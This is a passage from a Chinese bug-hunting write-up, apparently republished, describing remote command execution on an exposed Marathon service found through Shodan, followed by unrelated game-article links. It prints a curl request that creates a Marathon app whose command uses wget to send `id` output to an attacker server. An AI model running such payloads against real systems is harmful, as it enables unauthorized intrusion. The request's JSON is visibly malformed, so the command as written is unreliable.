挖洞经验 | 通过Shodan发现目标应用Marathon服务的RCE漏洞( 五 )
curl -sk -X POST -H \"Content-type: application/json\"https://XXX.XXX.XXX.XXX/v2/apps-d '{ \"mem\": 16 \"id\": \"rce-id\" \"cmd\": \"/usr/bin/wget --user-agent=marathon-id --post-data=https://mparticle.uc.cn/api/`id` attacker_server:55555/"'
3、再打开https://XXX.XXX.XXX.XXX/ui/#/apps 的Marathon服务管理界面 , 可以看到其中已经包含了一个名为“rce-id”的实例 , 这就是我们刚刚用curl命令创建的 。 在我的自架服务器中 , 稍等一会 , 就能看到XXX.XXX.XXX.XXX响应回来的cmd命令输出结果:
PS:测试过后 , 为了不对目标应用系统造成安全影响 , 我及时从Marathon界面中删除了创建的“rce-id”实例 。 整个过程中 , 就用到了netcat、curl命令和浏览器 , 另外 , 当然主要还是Shodan很给力了 。
以上全部数据来源互联网 , 如有侵权 , 请及时与我们联系 , 我们将进行删除 , 谢谢
推荐阅读
- 梦幻西游|梦幻西游:千亿经验奖励5连击!长久地坚持在此刻能否收获幸运?
- 手机游戏|梦幻西游手游:如何保证贸易少亏甚至小赚 小号、经验环必不可少
- 我的世界|我的世界:“最奢侈”的附魔是什么?我给胡萝卜钓竿打上经验修补
- 盲僧|LOL手游盲僧是英雄代表?灵药再推进阶教学,双区王者的经验
- 传奇世界|传奇世界:获声望的几种途径经验
- 大话西游2|大话西游2:一头年兽6千万经验,玩家怒刷3小时,疯狂上电视!
- 戒指|梦幻西游:10张玲珑图全程无经验,宝石还只出了一个!
- 挂机|玩游戏赚钱,个人总结日进200经验,有电脑就行!
- 梦幻西游|梦幻西游:文哥全服第1经验号过户,浩文预定了1800亿经验女号!
- 戒指|梦幻西游:一个宝箱有6次祈愿次数,里面藏了多少经验和指南书?